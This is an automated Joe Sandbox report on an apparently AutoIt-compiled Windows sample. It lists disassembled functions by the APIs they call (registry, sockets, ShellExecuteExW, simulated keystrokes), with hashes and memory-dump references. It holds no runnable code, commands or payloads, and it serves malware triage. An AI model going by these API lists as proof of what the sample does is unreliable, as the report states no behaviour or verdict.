Opcode ID: 027a58bf6f706fd296ec4d61acbbb04123560db44bb59d3a22dca3e0b47d41f0
Instruction ID: e10ce828c322065952e2117c9a9c5f71a0bf6505632d0aff329c86df16216a88
Opcode Fuzzy Hash: 027a58bf6f706fd296ec4d61acbbb04123560db44bb59d3a22dca3e0b47d41f0
Instruction Fuzzy Hash: F3112E31239B53BAE7045F55DC82D6A239C9F16310F20003AF601A7AC1EBB09DE04A69

Function 0026A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0026A806

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 7f8e5b18c78aed692297de07b5a31576413cd163b7a90b0daf1f297532fee968
Instruction ID: 08e25f4e51770b1063eda414a7a97314cdc67725098745df46005de9995613c6
Opcode Fuzzy Hash: 7f8e5b18c78aed692297de07b5a31576413cd163b7a90b0daf1f297532fee968
Instruction Fuzzy Hash: 5BC18975A2520ADFDB00CF98D485BAEB7F4FF09315F20806AE606E7241D774AA91CF91

Function 00266B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00266B63
LoadStringW.USER32(00000000), ref: 00266B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00266B80
LoadStringW.USER32(00000000), ref: 00266B87
_wprintf.LIBCMT ref: 00266BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00266BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00266BA8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: cf9e52338f369de09f6def6e0cb78cd1e098725680233f608a2cd67efd5cb837
Instruction ID: 186c2dd8142da4137441dc9885d3a8a0f7b6dcc47bfeb40c586b817bae273d4d
Opcode Fuzzy Hash: cf9e52338f369de09f6def6e0cb78cd1e098725680233f608a2cd67efd5cb837
Instruction Fuzzy Hash: CC016DF2900208BFEB11ABA4AD8DEE6376CD709304F4044A2B746E2041EE749E948F70

Function 00282B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00283C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00282BB5,?,?), ref: 00283C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00282BF6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: afae75c4d2b145eabe3225440bdcbc056bc0e608f886c94352957ab5b8a7788b
Instruction ID: 27fff9ffa3ae45304594779af3957189af8ef82749ed5c4febe7851da51dbb09
Opcode Fuzzy Hash: afae75c4d2b145eabe3225440bdcbc056bc0e608f886c94352957ab5b8a7788b
Instruction Fuzzy Hash: CB917A75224201EFCB00EF54C885B6EBBE5BF48310F14885DF996972A2DB74E969CF42

Function 002795BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00279691
WSAGetLastError.WSOCK32(00000000), ref: 0027969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 002796C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002796E9
WSAGetLastError.WSOCK32(00000000), ref: 002796F8
htons.WSOCK32(?,?,?,00000000,?), ref: 002797AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,002BDC00), ref: 00279765

Part of subcall function 0025D2FF: _strlen.LIBCMT ref: 0025D309

_strlen.LIBCMT ref: 00279800

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: b2b334ea2f03a9977f1fb5441084a67339b53a085b363b9fed6983a22facfd7b
Instruction ID: 03af830ae6e9a6662b72ff75d9a2721898112ab99ac07453da59d944152f0f9c
Opcode Fuzzy Hash: b2b334ea2f03a9977f1fb5441084a67339b53a085b363b9fed6983a22facfd7b
Instruction Fuzzy Hash: D3811071524300ABC714EFA4DC86E6FB7E8EF85714F108A1DF5599B292EB30D924CB92

Function 0024A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0024A991

Part of subcall function 00247D7C: __FF_MSGBANNER.LIBCMT ref: 00247D91
Part of subcall function 00247D7C: __NMSG_WRITE.LIBCMT ref: 00247D98
Part of subcall function 00247D7C: __malloc_crt.LIBCMT ref: 00247DB8

__lock.LIBCMT ref: 0024A9A4
__lock.LIBCMT ref: 0024A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,002D6DE0,00000018,00255E7B,?,00000000,00000109), ref: 0024AA0C
EnterCriticalSection.KERNEL32(8000000C,002D6DE0,00000018,00255E7B,?,00000000,00000109), ref: 0024AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0024AA39

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 4f80de12a2e813c56a4703f8a0430fb4a03cf6ff1c6dda45975a35a5ba70b811
Instruction ID: 5087ef14d38f117ae3c849a7c3765bedf57d6e4eb339ca277f40a2f240610710
Opcode Fuzzy Hash: 4f80de12a2e813c56a4703f8a0430fb4a03cf6ff1c6dda45975a35a5ba70b811
Instruction Fuzzy Hash: 44414E719A06129BEB18DF68D9C475CB7B0BF05735F108319E426AB1D1D7B49C61CF82

Function 00288ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00288EE4
GetDC.USER32(00000000), ref: 00288EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00288EF7
ReleaseDC.USER32(00000000,00000000), ref: 00288F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00288F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00288F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0028BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00288F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00288FAA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: c79c1b698368731f8bf5878d587a39009e949b122f0c9bd1f4b64b97088ded27
Instruction ID: 1a588e6045607c6bd9f491e2ac8232d70e9238900cdc5f50e46f8117251a143a
Opcode Fuzzy Hash: c79c1b698368731f8bf5878d587a39009e949b122f0c9bd1f4b64b97088ded27
Instruction Fuzzy Hash: 4B318E76201214BFEB109F60EC4AFEB3BADEF4A715F044065FE09DA191CAB59851CB70

Function 00290133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

GetSystemMetrics.USER32(0000000F), ref: 0029016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0029038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002903AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 002903D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002903FF
ShowWindow.USER32(00000003,00000000), ref: 00290421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00290440

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 14ad90eb61ba4d085f83573419de7e9add2fc49cd3a71055fe4e4770f70569e8
Instruction ID: 14a60c1d79ef90ad01deee173e91d0e066126a0007cfab50d974f78fc6fe527c
Opcode Fuzzy Hash: 14ad90eb61ba4d085f83573419de7e9add2fc49cd3a71055fe4e4770f70569e8
Instruction Fuzzy Hash: 0DA18E35A1061AEFDF18CF68C9C97BDBBB5BF08700F048169EC559A290D774AD60CB90

Function 0023AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d538e16477ca2c754c9a241341b8631059656148a38282f16bfdd6bc3f5a8d8
Instruction ID: 16dc74f33c658e62ca710ff1f66a1451174a1cca186fda0d95fb099116d1c1b7
Opcode Fuzzy Hash: 2d538e16477ca2c754c9a241341b8631059656148a38282f16bfdd6bc3f5a8d8
Instruction Fuzzy Hash: D8717DB0920109EFCF14CF98CC89ABEBB78FF85314F248159F955A6250C731AA21CFA5

Function 00282230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028225A
_memset.LIBCMT ref: 00282323
ShellExecuteExW.SHELL32(?), ref: 00282368

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

Part of subcall function 0023C6F4: _wcscpy.LIBCMT ref: 0023C717

CloseHandle.KERNEL32(00000000), ref: 0028242F
FreeLibrary.KERNEL32(00000000), ref: 0028243E

Strings

@, xrefs: 00282334

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: fbcdc656134ab5434da43a56ef01e8ad62476e2298a02af25395a8b7a012e84f
Instruction ID: 5fd83ec772adc9f4f2bff6980f39f6584b78c3dc4d2fe8f24a8b86912a504d04
Opcode Fuzzy Hash: fbcdc656134ab5434da43a56ef01e8ad62476e2298a02af25395a8b7a012e84f
Instruction Fuzzy Hash: A4717BB4920629DFCF04EFA4D48599DB7F5FF48310F108459E846AB291CB34AD64CF94

Function 00263DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00263DE7
GetKeyboardState.USER32(?), ref: 00263DFC
SetKeyboardState.USER32(?), ref: 00263E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00263E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00263EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00263EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00263F13

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6c59a57d0a7c0cc975685de89d78cea5e456f3c67c11c5c428f269f95b5e5398
Instruction ID: 557754f8b83243294e15d25fd7df30afe4ebace3b897c05d4399c7b66edefe0c
Opcode Fuzzy Hash: 6c59a57d0a7c0cc975685de89d78cea5e456f3c67c11c5c428f269f95b5e5398
Instruction Fuzzy Hash: FA51D4A0A247D63DFB368B34CC45BB67EA95F06304F084589F0D9468C3D7A9AEE4D760

Function 00263BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00263C02
GetKeyboardState.USER32(?), ref: 00263C17
SetKeyboardState.USER32(?), ref: 00263C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00263CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00263CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00263D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00263D26

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 14815989bbb8dc2fbeffdf401cae57ba15c4d1c4d796564c2738260c12943d76
Instruction ID: 529e7ac1e93f87807ecc661103eecfe8a384f1100582907f38e83fb80b4a2540
Opcode Fuzzy Hash: 14815989bbb8dc2fbeffdf401cae57ba15c4d1c4d796564c2738260c12943d76
Instruction Fuzzy Hash: C151F7A09247D63DFB36CB348C45BBABFA96B06304F088489F1D5568C2D694EEE4D750

Function 00267DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00267DBE
_wcsncpy.LIBCMT ref: 00267DF3
_wcsncpy.LIBCMT ref: 00267E25
_wcsncpy.LIBCMT ref: 00267E58
_wcsncpy.LIBCMT ref: 00267E9A
_wcsncpy.LIBCMT ref: 00267ED4
_wcsncpy.LIBCMT ref: 00267F03

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: b843747a25143c4d0a81e29cb287a9c89d0b738142ca70406e573680bcb796b0
Instruction ID: 3dcd2a062440698964f4ac9f0b030a2d5eeac8b84bdc6cd7ce05b4ade3f4fca2
Opcode Fuzzy Hash: b843747a25143c4d0a81e29cb287a9c89d0b738142ca70406e573680bcb796b0
Instruction Fuzzy Hash: 3E417066C20214B6CB14EBF4C886ACFB7AC9F45710F5089A6E514E3121FA34E6B48BA5

Function 00283D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00283DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00283DCB
FreeLibrary.KERNEL32(00000000), ref: 00283E80

Part of subcall function 00283D72: RegCloseKey.ADVAPI32(?), ref: 00283DE8
Part of subcall function 00283D72: FreeLibrary.KERNEL32(?), ref: 00283E3A
Part of subcall function 00283D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00283E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00283E25

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: a8e785bed10da5399f5e0ce787a1789ff2b8839b221673ef7906f903b762f937
Instruction ID: bb88b0beb876c6e932c620c6e93c7b040d4e3797a7358840506e0f3551ceece9
Opcode Fuzzy Hash: a8e785bed10da5399f5e0ce787a1789ff2b8839b221673ef7906f903b762f937
Instruction Fuzzy Hash: 2D31FEB5912109BFDB15EF94DC89AFFB7BCEF09700F000169E512E2190DA749F599B60

Function 00288FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00288FE7
GetWindowLongW.USER32(0184D848,000000F0), ref: 0028901A
GetWindowLongW.USER32(0184D848,000000F0), ref: 0028904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00289081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002890AB
GetWindowLongW.USER32(00000000,000000F0), ref: 002890BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002890D6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: eacceb695dfb62d97cba5d4403e5e24c4cd14f7e53bdeffb90eb4de862c8f67f
Instruction ID: 28a0e42e05a212a69739882a9900a89ac00b2383ac57acaaf42416067c9d37ad
Opcode Fuzzy Hash: eacceb695dfb62d97cba5d4403e5e24c4cd14f7e53bdeffb90eb4de862c8f67f
Instruction Fuzzy Hash: 5E316838251216DFDB219F58EC88F6437A9FB4A714F180164F5098F2F2CBB1A8A0CB41

Function 002608AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002608F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00260918
SysAllocString.OLEAUT32(00000000), ref: 0026091B
SysAllocString.OLEAUT32(?), ref: 00260939
SysFreeString.OLEAUT32(?), ref: 00260942
StringFromGUID2.OLE32(?,?,00000028), ref: 00260967
SysAllocString.OLEAUT32(?), ref: 00260975

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7bf011d4a7018d31ecc854bbd8672b1ab106387c7eab067b9000dbe01a5c58cd
Instruction ID: 7d6cbdaf21ba287b3d2f6f98abb5882e47ca2c9b23ed893d95b934c63e79287a
Opcode Fuzzy Hash: 7bf011d4a7018d31ecc854bbd8672b1ab106387c7eab067b9000dbe01a5c58cd
Instruction Fuzzy Hash: B321C772611209AFAB109F78DCC8DBB73ACEF09760B008525F909DB291DA70EC81DB60

Function 00262472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00262485
__wcsnicmp.LIBCMT ref: 002624A6
__wcsnicmp.LIBCMT ref: 002624C0

Strings

#OnAutoItStartRegister, xrefs: 002624BA
#requireadmin, xrefs: 002624A0
#notrayicon, xrefs: 0026247D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: eb444070b71fc274d5a2ffb48c61452359b8acfe0c1e9b159a57387d0a36b45a
Instruction ID: 6adfadb75cf7fb243c8c289f1586264cc690ee3cd904cd2d2443d44b5e57cc5d
Opcode Fuzzy Hash: eb444070b71fc274d5a2ffb48c61452359b8acfe0c1e9b159a57387d0a36b45a
Instruction Fuzzy Hash: 6D217F72174A12F7D338AA349C12EB77398EF65340FA04026F447A7041EA9599F9C395

Function 00260986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002609CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002609F1
SysAllocString.OLEAUT32(00000000), ref: 002609F4
SysAllocString.OLEAUT32 ref: 00260A15
SysFreeString.OLEAUT32 ref: 00260A1E
